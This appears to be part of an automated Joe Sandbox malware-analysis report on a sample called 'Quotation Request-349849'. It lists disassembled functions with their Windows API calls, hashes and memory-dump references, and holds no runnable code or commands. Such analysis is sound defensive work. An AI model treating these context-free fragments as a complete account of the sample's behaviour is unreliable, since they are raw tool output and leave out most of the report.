                                                      • Instruction ID: 5975cd0234ede0b8d12b7474081d58c08559f26b207377690b85a17f93dc9da0
                                                      • Opcode Fuzzy Hash: de9e5c6c4f835d476356f78841718fc4716dfd2395282beb8cb31279c7cfd6a8
                                                      • Instruction Fuzzy Hash: 0A512E34A00209EFCF10DF54C984AAE7BB5FF55361F148169F9A5EB2A0D731AD45CB90
                                                      Function 00829A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00829AD2
                                                      • __itow.LIBCMT ref: 00829B03
                                                        • Part of subcall function 00829D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00829DBE
                                                      • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00829B6C
                                                      • __itow.LIBCMT ref: 00829BC3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$__itow
                                                      • String ID:
                                                      • API String ID: 3379773720-0
                                                      • Opcode ID: c61116411070589fea9228ae6b04f6c9f555391cbd7c857eba66abdd24ec9fd2
                                                      • Instruction ID: ff0be56e9094d0d71d28ef79d3806908a7a77ba4d2a737ece7283b540d35d7e4
                                                      • Opcode Fuzzy Hash: c61116411070589fea9228ae6b04f6c9f555391cbd7c857eba66abdd24ec9fd2
                                                      • Instruction Fuzzy Hash: 85417170A00228ABDF15EF54E849BFE7BB9FF44720F00006AF949A7391DB749984CB61
                                                      Function 008469AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 008469D1
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 008469E1
                                                        • Part of subcall function 007D9837: __itow.LIBCMT ref: 007D9862
                                                        • Part of subcall function 007D9837: __swprintf.LIBCMT ref: 007D98AC
                                                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00846A45
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00846A51
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$__itow__swprintfsocket
                                                      • String ID:
                                                      • API String ID: 2214342067-0
                                                      • Opcode ID: 5c62046faa447652cdb62907759e8e22e89e5a72011dfd799e0e23909a5558d3
                                                      • Instruction ID: a16774ea866c0100045360bfba6d2feda42ad1dbd91b6d1e2555e1f6174e4b78
                                                      • Opcode Fuzzy Hash: 5c62046faa447652cdb62907759e8e22e89e5a72011dfd799e0e23909a5558d3
                                                      • Instruction Fuzzy Hash: 7341A375740210AFEB50AF28CC8AF3977A5EF09B14F048059FA59DF3C2DA789D008752
                                                      Function 0084641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0085F910), ref: 008464A7
                                                      • _strlen.LIBCMT ref: 008464D9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: _strlen
                                                      • String ID:
                                                      • API String ID: 4218353326-0
                                                      • Opcode ID: 9459a2f73a87c1ef67bf360717e77cf55b6078c58ffb4529683984b16b5dab38
                                                      • Instruction ID: 535801020f0eec20b89c865744978ccf349417387013ab27df6debfa9441a94e
                                                      • Opcode Fuzzy Hash: 9459a2f73a87c1ef67bf360717e77cf55b6078c58ffb4529683984b16b5dab38
                                                      • Instruction Fuzzy Hash: 6B419F71A00108ABCB14EBA8EC99EBEB7B8FF45310F118156F919D7392EB34AD14CB51
                                                      Function 0083B7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0083B89E
                                                      • GetLastError.KERNEL32(?,00000000), ref: 0083B8C4
                                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0083B8E9
                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0083B915
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                      • String ID:
                                                      • API String ID: 3321077145-0
                                                      • Opcode ID: 7e38da8b5512603887a5db855d5a8b51d3e6ab26a10867766891d9c6f7ca2263
                                                      • Instruction ID: 77c5c55003e59e9559497960f3aa3cd706229e71a5fa2f60e549a154dafd8cc1
                                                      • Opcode Fuzzy Hash: 7e38da8b5512603887a5db855d5a8b51d3e6ab26a10867766891d9c6f7ca2263
                                                      • Instruction Fuzzy Hash: C241F779A00650DFCB10EF15C489A59BBB1FF89710F098099EE4A9B362CB34ED01DB91
                                                      Function 00858851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 008588DE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: InvalidateRect
                                                      • String ID:
                                                      • API String ID: 634782764-0
                                                      • Opcode ID: a4c301a00ddc50ed66955068d07f2b257989fad323f573ab795043c83570b488
                                                      • Instruction ID: 40b814fbd2765272d189e293d3cd2185c5ccd1cca26404f6301ad35e6ef0e3ae
                                                      • Opcode Fuzzy Hash: a4c301a00ddc50ed66955068d07f2b257989fad323f573ab795043c83570b488
                                                      • Instruction Fuzzy Hash: B231A134600108EFEF219A68CC45BB97BA5FB05352FA44123FE51F62A1CE71A9489B93
                                                      Function 0085AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ClientToScreen.USER32(?,?), ref: 0085AB60
                                                      • GetWindowRect.USER32(?,?), ref: 0085ABD6
                                                      • PtInRect.USER32(?,?,0085C014), ref: 0085ABE6
                                                      • MessageBeep.USER32(00000000), ref: 0085AC57
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                      • String ID:
                                                      • API String ID: 1352109105-0
                                                      • Opcode ID: 8c30516f3c45673e79f0b771b2d53aa62f2b88de737700a14e983241ac4f3af2
                                                      • Instruction ID: 53afa000ff74f4cd9beb9cee108d1e522c6278fe0cce656fecbe5e12d35f510b
                                                      • Opcode Fuzzy Hash: 8c30516f3c45673e79f0b771b2d53aa62f2b88de737700a14e983241ac4f3af2
                                                      • Instruction Fuzzy Hash: 2F418C30600219DFCF1ADF58C8C4A697BF5FF49312F1882A9E955DB261D731AC49CB92
                                                      Function 00830AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00830B27
                                                      • SetKeyboardState.USER32(00000080,?,00000001), ref: 00830B43
                                                      • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00830BA9
                                                      • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00830BFB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: KeyboardState$InputMessagePostSend
                                                      • String ID:
                                                      • API String ID: 432972143-0
                                                      • Opcode ID: cc1b59d122f93f23dbec40ac0a29e42b4c70769ae5d263c0f13a62c2ac05d58b
                                                      • Instruction ID: 661cd4fed5e2b998e2d16ccf84c15e430766d204b8267bb0cfc8b0fcc09bceaa
                                                      • Opcode Fuzzy Hash: cc1b59d122f93f23dbec40ac0a29e42b4c70769ae5d263c0f13a62c2ac05d58b
                                                      • Instruction Fuzzy Hash: 0A313B709442186EFB308B698C15BFAFBA5FB85339F04425AF581D11D1C37489819BD1
                                                      Function 00830C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 00830C66
                                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 00830C82
                                                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 00830CE1
                                                      • SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 00830D33
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: KeyboardState$InputMessagePostSend
                                                      • String ID:
                                                      • API String ID: 432972143-0
                                                      • Opcode ID: 5ffc13c05ee402858907f1b09224386bdf06639e36535000a5b7aaa9d950623c
                                                      • Instruction ID: de95e282f233e986fd05c2182dae92c8478d52515287a542b55d505400d71c2e
                                                      • Opcode Fuzzy Hash: 5ffc13c05ee402858907f1b09224386bdf06639e36535000a5b7aaa9d950623c
                                                      • Instruction Fuzzy Hash: 273124309002186EFF308B6888247FEBBA6FB85311F14536AE581D21D2D3799986CBD2
                                                      Function 008061C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 008061FB
                                                      • __isleadbyte_l.LIBCMT ref: 00806229
                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00806257
                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0080628D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                      • String ID:
                                                      • API String ID: 3058430110-0
                                                      • Opcode ID: 18a1ebcfc84c06ea985e5b8d5abced5268e6f888cf54d5c08b47c1f8ee102a8f
                                                      • Instruction ID: 654ea705375859294989b96c8ee8ece6ee5e1c72dae849640cde881b3ae9ae81
                                                      • Opcode Fuzzy Hash: 18a1ebcfc84c06ea985e5b8d5abced5268e6f888cf54d5c08b47c1f8ee102a8f
                                                      • Instruction Fuzzy Hash: B5318E3160424AEFEB619F65CC48BBA7BA9FF42310F154129E864D71E1E731D970DB90
                                                      Function 00854EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetForegroundWindow.USER32 ref: 00854F02
                                                        • Part of subcall function 00833641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0083365B
                                                        • Part of subcall function 00833641: GetCurrentThreadId.KERNEL32 ref: 00833662
                                                        • Part of subcall function 00833641: AttachThreadInput.USER32(00000000,?,00835005), ref: 00833669
                                                      • GetCaretPos.USER32(?), ref: 00854F13
                                                      • ClientToScreen.USER32(00000000,?), ref: 00854F4E
                                                      • GetForegroundWindow.USER32 ref: 00854F54
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                      • String ID:
                                                      • API String ID: 2759813231-0
                                                      • Opcode ID: e7f209371980f8d427155e4a1a0373733877013542bfa6850d92efa10bfd20a4
                                                      • Instruction ID: 8687a9931f19811a57422e498d478046da45aa8860a552a27018e2bc4057d19f
                                                      • Opcode Fuzzy Hash: e7f209371980f8d427155e4a1a0373733877013542bfa6850d92efa10bfd20a4
                                                      • Instruction Fuzzy Hash: 71311E71D00208AFDB00EFA9C8859EFB7FDFF98304F10406AE515E7241EA759E458BA1
                                                      Function 0085C498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 007D2612: GetWindowLongW.USER32(?,000000EB), ref: 007D2623
                                                      • GetCursorPos.USER32(?), ref: 0085C4D2
                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0080B9AB,?,?,?,?,?), ref: 0085C4E7
                                                      • GetCursorPos.USER32(?), ref: 0085C534
                                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0080B9AB,?,?,?), ref: 0085C56E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                      • String ID:
                                                      • API String ID: 2864067406-0
                                                      • Opcode ID: 0c3e8a1fa84488629c4cf539acaaa0abfb53aa0e02f73941c18c10676e1e730e
                                                      • Instruction ID: ff99ec5efb0cd6c19175ef5703fa8618af2aa77d2c2d1a4a4d72f0c7e3be16f5
                                                      • Opcode Fuzzy Hash: 0c3e8a1fa84488629c4cf539acaaa0abfb53aa0e02f73941c18c10676e1e730e
                                                      • Instruction Fuzzy Hash: 7831EE35600618EFCF229F98C858EAA7BB5FB09312F044069FD05CB262D735AD58DFA4
                                                      Function 00828656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0082810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00828121
                                                        • Part of subcall function 0082810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0082812B
                                                        • Part of subcall function 0082810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0082813A
                                                        • Part of subcall function 0082810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00828141
                                                        • Part of subcall function 0082810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00828157
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 008286A3
                                                      • _memcmp.LIBCMT ref: 008286C6
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008286FC
                                                      • HeapFree.KERNEL32(00000000), ref: 00828703
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                      • String ID:
                                                      • API String ID: 1592001646-0
                                                      • Opcode ID: d0d7cf2cca7464dfac7bf6c523368c20a20c9d00350551d5efb40e9f54ffd573
                                                      • Instruction ID: f80778f3eb9a514ed2dc5cb8e64c791f48c69aecac4f419591eb93ca7e2f095a
                                                      • Opcode Fuzzy Hash: d0d7cf2cca7464dfac7bf6c523368c20a20c9d00350551d5efb40e9f54ffd573
                                                      • Instruction Fuzzy Hash: 47217A71E42218EFDF10DFA4D948BAEB7B8FF60315F144059E405A7281DB30AE45CB50
                                                      Function 007F098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __setmode.LIBCMT ref: 007F09AE
                                                        • Part of subcall function 007D5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00837896,?,?,00000000), ref: 007D5A2C
                                                        • Part of subcall function 007D5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00837896,?,?,00000000,?,?), ref: 007D5A50
                                                      • _fprintf.LIBCMT ref: 007F09E5
                                                      • OutputDebugStringW.KERNEL32(?), ref: 00825DBB
                                                        • Part of subcall function 007F4AAA: _flsall.LIBCMT ref: 007F4AC3
                                                      • __setmode.LIBCMT ref: 007F0A1A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                      • String ID:
                                                      • API String ID: 521402451-0
                                                      • Opcode ID: 6bcff6f03c48c85510bc77dd80171cc60f0995c086b2f37141e03be8773b90ab
                                                      • Instruction ID: b34200fe96449f876cebdd5ae7a209e8626790a9444026151663073d4b2f0485
                                                      • Opcode Fuzzy Hash: 6bcff6f03c48c85510bc77dd80171cc60f0995c086b2f37141e03be8773b90ab
                                                      • Instruction Fuzzy Hash: D7110532904208EFDB04B3B49C4E9BE7B68EF81320F244016F304A7383EE28588257E5
                                                      Function 00841767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 008417A3
                                                        • Part of subcall function 0084182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0084184C
                                                        • Part of subcall function 0084182D: InternetCloseHandle.WININET(00000000), ref: 008418E9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Internet$CloseConnectHandleOpen
                                                      • String ID:
                                                      • API String ID: 1463438336-0
                                                      • Opcode ID: b6e044e3ad0483630772f9c960c077fbe550804325819cc14279c23aa12dc6ba
                                                      • Instruction ID: d2e54b2b05cc31d496ff1407b3af21dda75d0d32c4a2edd840202303a30fc7b6
                                                      • Opcode Fuzzy Hash: b6e044e3ad0483630772f9c960c077fbe550804325819cc14279c23aa12dc6ba
                                                      • Instruction Fuzzy Hash: EC21F036200709BFEF129F64CC04FBABBA9FF48711F10402AFA41D6651DB75D850ABA0
                                                      Function 00833A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetFileAttributesW.KERNEL32(?,0085FAC0), ref: 00833A64
                                                      • GetLastError.KERNEL32 ref: 00833A73
                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00833A82
                                                      • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0085FAC0), ref: 00833ADF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                                      • String ID:
                                                      • API String ID: 2267087916-0
                                                      • Opcode ID: 49b89b77bab710aff85c8f818cfdf30e19ec14d7336fefcbe326e1a266955e8a
                                                      • Instruction ID: 19d1909ad6c1a3fdd943c9b4e08ca4cccb4716b0aa4cdb16a4c96bf96efc23c3
                                                      • Opcode Fuzzy Hash: 49b89b77bab710aff85c8f818cfdf30e19ec14d7336fefcbe326e1a266955e8a
